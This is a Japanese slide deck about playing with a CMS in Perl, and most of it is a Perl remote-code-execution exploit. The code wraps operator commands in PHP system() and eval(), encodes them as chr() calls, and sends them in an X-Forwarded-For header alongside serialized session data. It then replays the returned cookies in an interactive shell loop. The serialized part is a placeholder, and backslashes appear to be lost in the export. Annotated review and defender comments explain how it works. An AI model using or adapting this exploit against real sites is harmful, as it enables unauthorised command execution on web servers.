CMSとPerlで遊ぼう
- 2. @mahoyaya
• Name: mahoyaya
• Work: NWインフラ(?)
• Favorite: DIY
• Twitter: @mahoyaya
• blog: http://mahoyaya.hateblo.jp
• GitHub: https://github.com/mahoyaya
- 5. • <<< JPCERT/CC WEEKLY REPORT 2015-12-24 >>>
• 【1】ISC BIND 9 にサービス運用妨害 (DoS) の脆弱性
• 【2】Joomla! に複数の脆弱性
• 【3】Firefox に複数の脆弱性
• 【4】Ruby の標準添付ライブラリに脆弱性
• 【5】Symantec Endpoint Encryption に情報漏えいの脆弱性
• 【6】ScreenOS に複数の脆弱性
• 【7】WordPress 用プラグイン Welcart に SQL インジェクションの脆弱性
• 【8】WinRAR の実行ファイル読込みに脆弱性
• 【9】Ipswitch WhatsUp Gold に複数の脆弱性
- 9. while(1) {
# Interactive driver loop (slide 9): read one command, wrap it in a PHP
# system() call, send it to the configured host and echo the HTTP response.
# The helpers (getCmd, info, ssend) and the globals ($host, $port, $sock_addr,
# @ary_cookies, $print) are defined elsewhere in the deck and not shown here.
# NOTE(review): several literals below ("rn", "Aquitz", "ASet-Cookie", the
# die messages) look like escape sequences whose backslashes were dropped by
# the slide export; read them as the original regexes/strings, not literally.
my $response_header = "";
#========================#
# get command #
#========================#
my $cmd_str = getCmd();
# A command matching this pattern ends the session.
last if $cmd_str =~ m/Aquitz/;
# The operator-typed string is embedded verbatim in a PHP system() call;
# generate_payload (slide 10) later wraps that in eval(...). The quote after
# "system(" is a typographic apostrophe here — presumably an export artifact.
$cmd_str =~ s/^(.+)$/system(’$1');/;
info($cmd_str);
#=========================#
# connect to remote host #
#=========================#
# Each command is rebuilt and sent three times; cookies harvested from one
# response accumulate in @ary_cookies and ride along on the next request.
for(my $i = 0; $i < 3; $i++){
# generate payload string
# NOTE(review): @ary_cookies is passed flattened here, while generate_payload
# shifts a single $aref_cookies argument — confirm the intended calling
# convention (and what appendAll expects) against the original source.
my $request_str = generate_payload($cmd_str, @ary_cookies);
#info($request_str);
info("connect to $host:$port");
info("[send data] " . $request_str);
my $sock;
# PF_INET / SOCK_STREAM presumably come from `use Socket` (not shown).
socket($sock, PF_INET, SOCK_STREAM, 0) or die "can't open socketn";
connect($sock, $sock_addr) or die "can't connect remote hostn";
# no buffered sock $sock
# select() makes $sock the default output handle just long enough to turn on
# autoflush ($|) for it, then STDOUT is restored as the default handle.
select($sock); $|=1; select(STDOUT);
ssend($sock, $request_str);
#=====================#
# get http response #
#=====================#
# print headers
# Echo header lines until the blank line that ends the header section,
# keeping a copy in $response_header for the cookie/status scan below.
$response_header = "";
while (<$sock>){
print $_;
$response_header .= $_;
last if m/^rn$/;
}
# print body
# The body is echoed only when $print (set elsewhere) is positive; the
# socket is read to EOF either way.
$|=1;
while (<$sock>){
if( $print > 0){
print $_;
}
}
#====================================#
# get cookie and print status code #
#====================================#
# Turn each "Set-Cookie: name=value; attrs" line into a ready-made
# "Cookie: name=value" header (attributes after ';' dropped) and remember it
# for the next request; log the 3-digit status from the status line.
for my $line (split("rn", $response_header)){
if($line =~ m/ASet-Cookie: /){
$line =~ s/ASet-//;
my @ary = split(";", $line);
push(@ary_cookies, $ary[0]);
info("<" . $ary[0] . ">");
} elsif($line =~ m|AHTTP/1.1 |){
my $status = $line;
$status =~ s|AHTTP/1.1 ([0-9]{3}) .+z|$1|;
info("<Response: " . $status . ">");
}
}
close($sock) if defined $sock;
print "================================n";
} # end for loop
} # end while
- 10. sub php_str_noquotes {
# Encode a string as a PHP expression made only of chr() calls joined by '.',
# e.g. "ab" -> "chr(97).chr(98)", so the resulting PHP contains no quote
# characters. Arg: the string to encode. Returns the dotted chr() expression;
# the substr trims the trailing '.' left by the loop.
# NOTE(review): unpack "C" takes one byte per character — what happens for
# characters above 0xFF is not established here; confirm if non-ASCII input
# is expected.
my $data = shift;
my $encoded = "";
for(split("", $data)){
$encoded .= 'chr(' . unpack("C", $_) . ').';
}
return substr($encoded, 0, length($encoded) - 1);
}
sub generate_payload {
# Build the raw HTTP/1.1 request text for one attempt. Args: the PHP code to
# run, and the cookie argument that is handed on to appendAll (see the call
# site on slide 9). Returns the request as one string. $request_url, $host,
# $port and the append/appendAll helpers are defined elsewhere (not shown).
my $php_payload = shift;
my $aref_cookies = shift;
my $request_str = "";
# Wrap the code in eval(...) built from chr() calls so it carries no quotes.
$php_payload = 'eval(' . php_str_noquotes($php_payload) . ')';
# 4-byte sequence appended after the payload (the escape backslashes appear
# to have been lost in the slide export); the author's note calls it a
# utf8 4-byte char.
my $terminate = "xf0xfdxfdxfd";
# Slide placeholder, not valid Perl: "<serialized session data + $php_payload>"
# stands in for whatever builds the serialized session string in the original.
my $exploit_template = <シリアライズしたセッションデータ+$php_payload>
$exploit_template .= $terminate; #utf8 4byte char
# set headers
# Defender's note: the payload travels in the X-Forwarded-For header, paired
# with a fixed iPhone User-Agent and "Connection: close"; an X-Forwarded-For
# value that is not an IP address is the obvious thing to alert on in
# web-server access logs.
my $ua = 'User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3';
my $xff = 'x-forwarded-for: ' . $exploit_template;
$request_str = append($request_str, "GET " . $request_url . " HTTP/1.1");
$request_str = append($request_str, "Host: " . $host . ":" . $port);
$request_str = append($request_str, "Accept-Encoding: gzip, deflate");
$request_str = append($request_str, $xff);
$request_str = append($request_str, "Accept: */*");
$request_str = append($request_str, $ua);
$request_str = append($request_str, "Connection: close");
# Cookies collected from earlier responses are replayed here.
$request_str = appendAll($request_str, $aref_cookies);
# Empty line terminates the header block.
$request_str = append($request_str, "");
return $request_str;
}